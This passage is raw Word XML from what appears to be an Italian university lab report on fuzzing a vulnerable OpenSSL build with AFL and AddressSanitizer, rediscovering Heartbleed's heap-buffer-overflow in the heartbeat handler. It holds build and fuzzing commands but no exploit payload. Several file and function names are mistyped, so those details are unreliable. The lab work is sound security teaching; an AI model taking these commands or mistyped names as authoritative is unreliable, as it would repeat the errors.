          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C1B62">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. AFL_UDE_ASAN=</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1B62">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1B62">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> afl-g++ handshake.cc -o handshake openssl/libssl.a openssl/libcrypto.a -I openssl/include -ldl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CB5472" w14:textId="665435F9" w:rsidR="006B750B" w:rsidRPr="00543135" w:rsidRDefault="008C1B62" w:rsidP="00543135">
      <w:pPr>
        <w:pStyle w:val="NormaleWeb"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="2" w:color="888888"/>
          <w:left w:val="single" w:sz="6" w:space="2" w:color="888888"/>
          <w:bottom w:val="single" w:sz="6" w:space="1"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461644"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C1B62">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2. openssl req -x509 -newkey rsa:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1B62">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>512</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1B62">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -keyout server.key -</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1B62">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1B62">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> server.pem -days </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1B62">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>365</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1B62">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -nodes -subj /CN=a/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77068915" w14:textId="2AA90EB9" w:rsidR="003315C7" w:rsidRDefault="006B750B" w:rsidP="00543135">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F4654A8" wp14:editId="4029D9DE">
            <wp:extent cx="7045129" cy="560717"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1414763455" name="Immagine 6" descr="Immagine che contiene testo, elettronica, computer, schermata&#10;&#10;Descrizione generata automaticament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3455" name="Immagine 6" descr="Immagine che contiene testo, elettronica, computer, schermata&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId77"/>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5324" t="36920" r="33465" b="54423"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7330026" cy="583392"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FE3913" w14:textId="77777777" w:rsidR="0044325E" w:rsidRDefault="0044325E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA6FBB4" w14:textId="62CD45DE" w:rsidR="00543135" w:rsidRDefault="003315C7" w:rsidP="008E3536">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00C6703A">
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="0044325E">
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="00C6703A">
        <w:t>iamo AFL con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> il test harness</w:t>
      </w:r>
      <w:r w:rsidR="00C6703A">
        <w:t xml:space="preserve"> utilizzando come seed un file </w:t>
      </w:r>
      <w:r w:rsidR="00902B82">
        <w:t>contenente la parola “ciao”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC33286" w14:textId="77777777" w:rsidR="00864706" w:rsidRDefault="0044325E" w:rsidP="0044325E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="287533D9" wp14:editId="4B9D16FD">
            <wp:extent cx="4218317" cy="4203575"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1922753135" name="Immagine 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3135" name="Immagine 7">
                      <a:hlinkClick r:id="rId79"/>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l="19484" t="5544" r="43894" b="29558"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4231757" cy="4216968"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B0D8E6" w14:textId="77777777" w:rsidR="005E3CFE" w:rsidRDefault="00CA4E8B" w:rsidP="00864706">
      <w:r>
        <w:t xml:space="preserve">Interrompiamo l’esecuzione dopo aver verificato che </w:t>
      </w:r>
      <w:r w:rsidR="005E3CFE">
        <w:t>c’è stato un crash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560C0539" w14:textId="22D775A9" w:rsidR="00D4662F" w:rsidRDefault="00F50E87" w:rsidP="00522B83">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EC9A6E4" wp14:editId="2D208911">
            <wp:extent cx="6050280" cy="3898093"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="2023656709" name="Immagine 1" descr="Immagine che contiene testo, schermata, software, computer&#10;&#10;Descrizione generata automaticamen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6709" name="Immagine 1" descr="Immagine che contiene testo, schermata, software, computer&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId81"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId82"/>
                    <a:srcRect l="15937" t="13861" r="20886" b="13776"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6070128" cy="3910881"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A475D5D" w14:textId="77777777" w:rsidR="00D4662F" w:rsidRDefault="00D4662F" w:rsidP="00864706"/>
    <w:p w14:paraId="2ED5A821" w14:textId="77777777" w:rsidR="00D4662F" w:rsidRDefault="00D4662F" w:rsidP="00D4662F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Che tipo di errore è stato rilevato ? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559FD0AE" w14:textId="77777777" w:rsidR="00D4662F" w:rsidRDefault="00D4662F" w:rsidP="00D4662F">
      <w:r>
        <w:t>L'errore rilevato è un "heap-buffer-overflow", che indica che si è verificato un overflow del buffer di memoria heap. L'indirizzo specifico coinvolto è "0x629000009748".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F15831E" w14:textId="77777777" w:rsidR="00D4662F" w:rsidRDefault="00D4662F" w:rsidP="00D4662F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
      </w:pPr>
      <w:r>
        <w:t>- Qual è il punto nel codice di OpenSSL che causa l'errore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275402EC" w14:textId="77777777" w:rsidR="00D4662F" w:rsidRDefault="00D4662F" w:rsidP="00D4662F">
      <w:r>
        <w:t>Il punto nel codice di OpenSSL che causa l'errore è indicato come la funzione "tis1_process_heartbeat" nel file "/home/untna/Desktop/SoftwareSecurity-Labs/fuzzing/heartbleed/openssl/ssl/ti_lib.c" alla riga 2586.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D00D64C" w14:textId="77777777" w:rsidR="00D4662F" w:rsidRDefault="00D4662F" w:rsidP="00D4662F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
      </w:pPr>
      <w:r>
        <w:t>- Qual è il punto nel codice di OpenSSL che ha allocato il buffer?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042A1527" w14:textId="77777777" w:rsidR="00D4662F" w:rsidRDefault="00D4662F" w:rsidP="00D4662F">
      <w:r>
        <w:t>Il punto nel codice di OpenSSL che ha allocato il buffer è indicato come la funzione "CRYPTO_malloc" nel file "/home/untna/Desktop/SoftwareSecurity-Labs/fuzzing/heartbleed/openssl/crypto/mex.c" alla riga 308.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C78C659" w14:textId="510F6EA4" w:rsidR="00543135" w:rsidRDefault="000F58AA" w:rsidP="00864706">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58146776" wp14:editId="1527B922">
            <wp:extent cx="6642100" cy="3735070"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="882502252" name="Immagine 8" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automa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02252" name="Immagine 8" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticament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19B41510" w14:textId="77777777" w:rsidR="00F50E87" w:rsidRDefault="00F50E87" w:rsidP="00F50E87">
      <w:r>
        <w:t>Analizziamo il crash mandando in esecuzione il programma con gdb e in ingresso l’output ottenuto dal fuzzing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C5F0CF" w14:textId="77777777" w:rsidR="00F50E87" w:rsidRDefault="00F50E87" w:rsidP="00864706"/>
    <w:p w14:paraId="518AF09D" w14:textId="1EF15F6D" w:rsidR="00FF5519" w:rsidRDefault="00FF5519">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BAD73A6" wp14:editId="328C261C">
            <wp:extent cx="6446118" cy="629728"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1705665736" name="Immagine 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5736" name="Immagine 9">
                      <a:hlinkClick r:id="rId85"/>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l="21436" t="35347" r="28362" b="55932"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6710525" cy="655558"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2089451A" w14:textId="7FF52C9F" w:rsidR="005F387B" w:rsidRDefault="00C7641F" w:rsidP="007669D1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70F1F1F0" wp14:editId="423082A2">
            <wp:extent cx="3326674" cy="2032502"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="205397895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6652" cy="2050818"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FD6DDA3" wp14:editId="7A2C03EB">
            <wp:extent cx="3335383" cy="746304"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3175"/>
            <wp:docPr id="127905904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7350" cy="773595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC885D1" w14:textId="0FD7D859" w:rsidR="005F38ED" w:rsidRDefault="005F38ED">
      <w:r>
        <w:t xml:space="preserve">Utilizzando </w:t>
      </w:r>
      <w:r w:rsidR="00B73AEA">
        <w:t>afl-clang-fast</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDAC59E" w14:textId="77777777" w:rsidR="002E34B8" w:rsidRDefault="002E34B8">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182775"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1. ~$ AFL_USE_ASAN=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> CC=afl-clang-fast CXX=afl-clang-fast++ ./config -d -g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DC1B02" w14:textId="77777777" w:rsidR="002E34B8" w:rsidRDefault="002E34B8">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182775"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>2. ~$ make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0505090D" w14:textId="77777777" w:rsidR="002E34B8" w:rsidRDefault="002E34B8">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182775"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>3. ~$ AFL_USE_ASAN=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> afl-clang-fast target.c -o target openssl/libssl.a openssl/libcrypto.a -I openssl/include -ldl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB7F44A" w14:textId="78FCD918" w:rsidR="002E34B8" w:rsidRDefault="002E34B8">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182775"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>4. ~$ openssl req -x509 -newkey rsa:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>512</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> -keyout server.key -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> server.pem -days </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>365</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> -nodes -subj /CN=a/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23305C63" w14:textId="77777777" w:rsidR="004F67C3" w:rsidRDefault="007669D1" w:rsidP="004F67C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706545"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">1. ~$ afl-fuzz -i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DCC6E0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m none -t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="F5AB35"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA84200" w14:textId="228D5631" w:rsidR="004F67C3" w:rsidRDefault="004F67C3" w:rsidP="004F67C3">
      <w:pPr>
        <w:divId w:val="1002706545"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1619E907" wp14:editId="74E96C2B">
            <wp:extent cx="6653349" cy="4129755"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="1790667065" name="Immagine 2"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7065" name="Immagine 2" descr="Immagine che contiene testo, schermata, Software multimediale, software&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId89"/>
                    <a:srcRect l="32104" t="42018" r="8803" b="5495"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6753974" cy="4192213"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD4DE40" w14:textId="2CF8111A" w:rsidR="00B04C44" w:rsidRPr="004F67C3" w:rsidRDefault="00585479" w:rsidP="00A015EE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1002706545"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46C0EF03" wp14:editId="5FFB3721">
            <wp:extent cx="6645910" cy="4102735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="534505406" name="Immagine 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5406" name="Immagine 3" descr="Immagine che contiene testo, schermata, design&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId90"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="4102735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FD49AAA" wp14:editId="6B097FD1">
            <wp:extent cx="6645910" cy="544195"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="14319830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83006" name="Immagine 1431983006"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId91"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="544195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
